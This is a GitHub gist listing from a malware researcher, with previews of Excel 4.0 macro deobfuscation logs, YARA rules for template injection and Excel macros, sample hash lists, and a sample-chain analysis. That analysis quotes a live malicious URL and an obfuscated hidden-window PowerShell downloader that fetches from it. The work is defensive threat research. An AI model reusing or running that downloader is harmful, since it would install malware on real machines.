Skip to content

Instantly share code, notes, and snippets.

View JohnLaTwC's full-sized avatar

John Lambert JohnLaTwC

631 followers · 1 following
  • Microsoft Corporation
View GitHub Profile
@JohnLaTwC
JohnLaTwC / 96cefc000e35446bf3d2cc117df80858f8df2caa9395aa2e9a0862646ee150e3
Created May 28, 2020 19:01
xls4 macro
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
@JohnLaTwC
JohnLaTwC / ed933e3c4add755c7e1066f2c8c765e8516fabb6445f1e5265e3bc11b6b50b1d
Created May 28, 2020 16:09
shellcode XLS4
This file has been truncated, but you can view the full file.
ed933e3c4add755c7e1066f2c8c765e8516fabb6445f1e5265e3bc11b6b50b1d
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
@JohnLaTwC
JohnLaTwC / sample chain
Created May 24, 2020 17:31
Template injection attack 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
This file has been truncated, but you can view the full file.
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63
@JohnLaTwC
JohnLaTwC / error
Created May 24, 2020 16:56
[Loading Cells]
auto_open: auto_openhmqja->Sheet2!$HT$59712
[Starting Deobfuscation]
CELL:HT59712 , FullEvaluation , SET.VALUE(Sheet2!IJ9596,-4545)
CELL:HT59713 , FullEvaluation , GOTO(AG21387)
CELL:AG21387 , FullEvaluation , SET.VALUE(Sheet2!GY52195,-50.25)
CELL:AG21388 , FullEvaluation , RUN(Sheet2!HU17490)
CELL:HU17490 , FullEvaluation , SET.VALUE(Sheet2!II36015,-424)
CELL:HU17491 , FullEvaluation , RUN(Sheet2!DX56863)
@JohnLaTwC
JohnLaTwC / get_cell_info
Created May 24, 2020 16:55
get_cell_info
def get_cell_info(self,sheet_name, col, row, type_ID):
sheet = self._excel.Excel4MacroSheets(sheet_name)
cell = col+row
data = None
if int(type_ID) == 2:
data = sheet.Range(col+row).Row
print(data)
return data
@JohnLaTwC
JohnLaTwC / 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
Created May 23, 2020 17:39
xlmdeobfuscator output 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
> xlmdeobfuscator --file 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
@JohnLaTwC
JohnLaTwC / templateinjection.txt
Created May 8, 2020 18:37
List of files that suggest template injection
002fdaed68afdfe9ffe13c183499f790fa50074e100aee5f92705b6f0510b222
01827a6ce4fe51472a8383505e90c390740f8d5476742f2d2f23723bfac088b9
01c510a8e96ed12563e5472dc5c53ba44a39d964d413e4e445b83281fc14c8b5
026d98fe5060df8ad3fdb873a700fd6b83e5d8c7dce81377a05d0631edbd4800
03509040229be42bb65489220bce2d296558f951ecf71762ce7d22ce6b6614fe
03a9b2e7264fc1471c518b5d72133f943b7859856a58d5c897d46fc8fb829ca3
03e172565a8780680009cbfae12b33e542f849e261c136d2aa053be01a779ae8
03f25bd3540cf59680ef6f37553e2389f71d46d39a4e698777983118b7d6eb17
04492ffea132ee1677bb0363b2016f2402cbe0047ed195782eb8a04edd1d8347
04907b567b7830e7e8732cd8c7854b62dafbd980d09b9e3d7f371c3a9dc001a1
@JohnLaTwC
JohnLaTwC / template_injection.yara
Created May 8, 2020 17:16
Word OXML Template Injection
rule gen_injected_template_Word
{
meta:
description = "Detects injected templates in DOCX"
author = "John Lambert @JohnLaTwC"
date = "2020-05-03"
hash1 = "a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063"
hash2 = "a275dfa95393148bb9e0ddf5346f9fedcc9c87fa2ec3ce1ec875843664c37c89"
hash3 = "ed4835e5fd10bbd2be04c5ea9eb2b8e750aff2ef235de6e0f18d369469f69c83"
file_protocol_hash1 = "ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08 (settings.xml.rels)"
@JohnLaTwC
JohnLaTwC / OOMLExcel4.0Macro.yara
Created April 15, 2020 19:17
OOML Excel 4.0 macro
rule gen_ModernExcel4Macro
{
meta:
description = "Detects Modern Excel4 macro use"
author = "John Lambert @JohnLaTwC"
date = "2020-04-15"
hash1 = "308c0fee671459705221c5f1a8cee944f5ea803fddd0faa620cc8266d48c662b"
hash2 = "618fee2c2f89a4f15b680e1ca9393d25c857e6d107fa0eb45b1a21c7601f975e"
reference1 = "https://twitter.com/DissectMalware/status/1250411834953420808"
strings:
@JohnLaTwC
JohnLaTwC / file list
Created April 2, 2020 23:09
Excel 4.0 macro "encrypted" files
18f844bea6822e4d3a8eee0722680661d00b80a42db2ea3e59bc433a9767f486
1a830e023a0947f2aff15f04acc6b3485c9cbc5ea7e0afeef532175e68fa9dc5
1b55ade7f333e718a0c43022832efa94f961b9d16ed14cabbb76e4b495b3870f
1c1df604fcf699da117ff934dedc7bc295f1bf78aa627f3cd092bcc617ecbc65
35c1fefb093e9612a5ab4caa9c45477885a49ec9d278de285ad2ed4ec4e51451
409003773e411ae1773be2aa77ab8da829bd91dc4088e5bb6202e0a842ad9ffe
4478b13059e5b208b3e79b53bae9f17e365fc43c36d4965c5ebe13dc2be1b2d9
4c3d65fd04b218f88b34b102e4b82ad7ea1cfce5109ca84a124dbf7b88ceab30
4c462533b34b4e65efc6e1dbdfd4f873c4d2222549f431e87f966756368eca8f
539e9628a7707d2877cbbbcc68a4410fc0129ffa8318dd4115e9ee65bfb9d2ba